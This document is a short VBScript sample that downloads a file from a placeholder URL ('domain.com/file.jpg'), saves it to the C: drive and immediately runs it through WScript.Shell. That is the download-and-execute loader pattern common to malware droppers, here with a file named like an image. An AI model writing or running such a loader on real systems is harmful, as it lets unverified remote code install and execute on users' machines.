strFileURL = "http://www.domain.com/file.jpg"
strHDLocation = "C:\file.jpg"
 
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
 
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
 
If objXMLHTTP.Status = 200 Then
 Set objADOStream = CreateObject("ADODB.Stream")
 objADOStream.Open
 objADOStream.Type = 1 'adTypeBinary
 
 objADOStream.Write objXMLHTTP.ResponseBody
 objADOStream.Position = 0
 
 Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
 Set objFSO = Nothing
 
 objADOStream.SaveToFile strHDLocation
 objADOStream.Close
 Set objADOStream = Nothing
End if

Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & strHDLocation & Chr(34), 1, false
  
Set shell = Nothing
Set objXMLHTTP = Nothing